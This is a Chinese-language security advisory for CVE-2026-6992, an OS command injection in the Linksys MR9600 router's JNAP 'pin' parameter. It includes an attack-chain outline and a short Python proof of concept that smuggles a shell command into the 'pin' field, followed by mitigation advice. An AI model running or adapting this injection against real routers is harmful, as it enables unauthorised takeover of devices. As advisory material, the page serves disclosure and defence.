CVE-2026-6992 CVSS 7.2 高危

CVE-2026-6992 Linksys MR9600操作系统命令注入漏洞

披露日期: 2026-04-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6992

漏洞类型

操作系统命令注入

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Linksys MR9600

漏洞概述

Linksys MR9600路由器固件版本2.0.6.206937中存在高危漏洞。该漏洞位于JNAP Action Handler组件的`/etc/init.d/run_central2.sh`文件中的`BTRequestGetSmartConnectStatus`函数。由于对参数`pin`的验证不足，攻击者可在具有高权限的情况下发起远程攻击，通过构造恶意请求实现操作系统命令注入。目前漏洞利用代码已公开，且厂商未作出回应，存在极高安全风险。

技术细节

该漏洞的核心在于Linksys MR9600设备对JNAP（JSON Network Access Protocol）请求的处理逻辑。受影响的文件是`/etc/init.d/run_central2.sh`，其中的`BTRequestGetSmartConnectStatus`函数用于处理特定的状态获取请求。在实现上，该函数直接接收用户传入的`pin`参数，并将其传递给系统 shell 执行，未经过滤或转义特殊字符。攻击者若具备管理员权限（PR:H），可向目标设备发送特制的JNAP POST请求，在`pin`字段中注入Shell元字符（如 `;`、`|` 或 `$(...)`）。由于攻击复杂度低（AC:L）且无需用户交互（UI:N），一旦请求被处理，注入的命令将在系统权限下执行，导致攻击者完全控制设备，影响机密性、完整性和可用性。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别目标设备为Linksys MR9600，并确认其固件版本为2.0.6.206937或受影响版本。

STEP 2

2. 获取权限

由于CVSS向量显示PR:H，攻击者需要通过暴力破解、默认凭证或其他方式获取路由器管理员界面的登录凭证。

STEP 3

3. 构造恶意请求

攻击者构造包含恶意Shell命令的JNAP请求，利用`BTRequestGetSmartConnectStatus`接口中的`pin`参数注入payload。

STEP 4

4. 命令执行

服务器端接收到请求后，未过滤`pin`参数直接传递给Shell执行，导致攻击者注入的命令在设备上运行。

STEP 5

5. 建立控制

攻击者利用执行的命令下载后门、修改配置或窃取数据，完全控制受影响的路由器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target URL (Example)
target_url = "http://192.168.1.1/JNAP/"

# Malicious payload to inject commands (e.g., creating a file or reversing shell)
# Note: Requires authentication (High Privilege)
payload = {
    "action": "http://linksys.com/jnap/run_central2/BTRequestGetSmartConnectStatus",
    "pin": "12345; touch /tmp/poc_test; #"
}

headers = {
    "Content-Type": "application/json",
    "X-JNAP-Authorization": "<BASE64_ENCODED_CREDENTIALS>"
}

try:
    response = requests.post(target_url, data=json.dumps(payload), headers=headers, timeout=5)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if command executed.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

Linksys MR9600 2.0.6.206937

防御指南

临时缓解措施

鉴于厂商目前尚未发布修复补丁，建议立即将路由器管理后台的访问权限限制在本地内网，禁止通过互联网远程管理。务必修改路由器默认登录凭证为复杂密码，防止未授权访问。此外，应定期监控路由器日志和网络流量，如发现异常的数据传输或CPU占用率飙升，应立即断网排查。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6992
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6992
3 Details https://www.cvedetails.com/cve/CVE-2026-6992/
4 VulDB https://vuldb.com/cve/CVE-2026-6992
5 Link https://github.com/utmost3/cve/issues/2
6 Link https://vuldb.com/submit/797086
7 Link https://vuldb.com/vuln/359544
8 Link https://vuldb.com/vuln/359544/cti
9 Link https://www.linksys.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表